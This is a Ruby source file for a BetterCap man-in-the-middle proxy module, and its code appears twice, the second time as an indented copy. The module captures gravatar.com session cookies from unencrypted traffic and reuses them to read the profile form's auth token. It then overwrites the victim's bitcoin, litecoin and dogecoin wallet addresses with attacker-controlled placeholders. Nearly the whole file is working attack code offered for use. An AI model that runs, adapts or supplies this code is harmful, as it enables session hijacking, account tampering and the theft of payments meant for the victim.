groovecoder/update_gravatar_wallets.rb

## update_gravatar_wallets.rb
=begin

BETTERCAP

Author : Luke "groovecoder" Crouch
Email  : luke.crouch@gmail.com
Blog   : http://groovecoder.com

This project is released under the GPL 3 license.

=end

require "nokogiri"

class UpdateGravatarWallets < BetterCap::Proxy::HTTP::Module
  meta(
    'Name'        => 'UpdateGravatarWallets',
    'Description' => "Intercepts gravatar.com session cookies and uses them to update the victim's gravatar profile's crypto-currency wallet addresses.",
    'Version'     => '1.0.0',
    'Author'      => "Luke 'groovecoder' Crouch",
    'License'     => 'GPL3'
  )

  def on_request( request, response )
    # Hack insecure requests to gravatar.com
    if request.host == "www.gravatar.com" and response.content_type =~ /^image\/png/
      BetterCap::Logger.info "Hacking http://#{request.host}"
      cookie = request.headers['Cookie']
      auth = ""

      # get the auth value for the form-profile
      uri = URI('https://en.gravatar.com/profiles/edit/#currency-services')
      Net::HTTP.start(uri.host, uri.port, :use_ssl => true) do |http|
          request = Net::HTTP::Get.new uri
          request['Cookie'] = cookie
          response = http.request request
          body = response.read_body
          doc = Nokogiri::HTML(body)
          input = doc.css('input[name="auth"]').first
          auth = input['value']
      end

      # POST new wallet addresses using the hijacked cookie and the auth value
      Net::HTTP.start(uri.host, uri.port, :use_ssl => true) do |http|
          request = Net::HTTP::Post.new uri
          request['Cookie'] = cookie
          request.set_form_data('auth' => auth,
                                'panel' => 'currency-services',
                                'currency.bitcoin' => 'attacker-bitcoin-address',
                                'currency.litecoin' => 'attacker-litecoin-address',
                                'currency.dogecoin' => 'attacker-dogecoin-address',
                                'save' => 'Save Currencies')
          response = http.request request
      end
    end
  end
end
	=begin

	BETTERCAP

	Author : Luke "groovecoder" Crouch
	Email : luke.crouch@gmail.com
	Blog : http://groovecoder.com

	This project is released under the GPL 3 license.

	=end

	require "nokogiri"

	class UpdateGravatarWallets < BetterCap::Proxy::HTTP::Module
	meta(
	'Name' => 'UpdateGravatarWallets',
	'Description' => "Intercepts gravatar.com session cookies and uses them to update the victim's gravatar profile's crypto-currency wallet addresses.",
	'Version' => '1.0.0',
	'Author' => "Luke 'groovecoder' Crouch",
	'License' => 'GPL3'
	)

	def on_request( request, response )
	# Hack insecure requests to gravatar.com
	if request.host == "www.gravatar.com" and response.content_type =~ /^image\/png/
	BetterCap::Logger.info "Hacking http://#{request.host}"
	cookie = request.headers['Cookie']
	auth = ""

	# get the auth value for the form-profile
	uri = URI('https://en.gravatar.com/profiles/edit/#currency-services')
	Net::HTTP.start(uri.host, uri.port, :use_ssl => true) do \|http\|
	request = Net::HTTP::Get.new uri
	request['Cookie'] = cookie
	response = http.request request
	body = response.read_body
	doc = Nokogiri::HTML(body)
	input = doc.css('input[name="auth"]').first
	auth = input['value']
	end

	# POST new wallet addresses using the hijacked cookie and the auth value
	Net::HTTP.start(uri.host, uri.port, :use_ssl => true) do \|http\|
	request = Net::HTTP::Post.new uri
	request['Cookie'] = cookie
	request.set_form_data('auth' => auth,
	'panel' => 'currency-services',
	'currency.bitcoin' => 'attacker-bitcoin-address',
	'currency.litecoin' => 'attacker-litecoin-address',
	'currency.dogecoin' => 'attacker-dogecoin-address',
	'save' => 'Save Currencies')
	response = http.request request
	end
	end
	end
	end